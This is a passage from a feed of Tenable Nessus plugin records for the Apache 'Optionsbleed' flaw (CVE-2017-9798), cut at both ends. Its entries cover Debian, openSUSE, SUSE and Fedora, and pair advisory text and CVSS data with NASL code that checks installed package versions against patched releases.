script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec-custom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:36", "description": "This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/103399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1083.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103399);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)\");\n script_summary(english:\"Check for the openSUSE-2017-1083 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debugsource-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-devel-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-example-pages-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debugsource-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-devel-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-example-pages-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-debuginfo-2.4.23-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:07", "description": "This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2542-1) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2", "p-cpe:/a:novell:suse_linux:apache2-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-debugsource", "p-cpe:/a:novell:suse_linux:apache2-example-pages", "p-cpe:/a:novell:suse_linux:apache2-prefork", "p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-utils", "p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-worker", "p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2542-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103413", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2542-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103413);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2542-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172542-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e60e3183\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1572=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1572=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1572=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1572=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1572=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-debugsource-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-example-pages-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-prefork-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-prefork-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-utils-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-utils-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-worker-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"apache2-worker-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-debugsource-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-example-pages-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-prefork-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-prefork-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-utils-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-utils-debuginfo-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-worker-2.4.23-29.6.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"apache2-worker-debuginfo-2.4.23-29.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:46", "description": "This is a release fixing a security fix applied upstream, known as 'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why wouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-25T00:00:00", "type": "nessus", "title": "Fedora 26 : httpd (2017-a52f252521) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-A52F252521.NASL", "href": "https://www.tenable.com/plugins/nessus/103438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a52f252521.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103438);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"FEDORA\", value:\"2017-a52f252521\");\n\n script_name(english:\"Fedora 26 : httpd (2017-a52f252521) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a release fixing a security fix applied upstream, known as\n'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why\nwouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a52f252521\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) 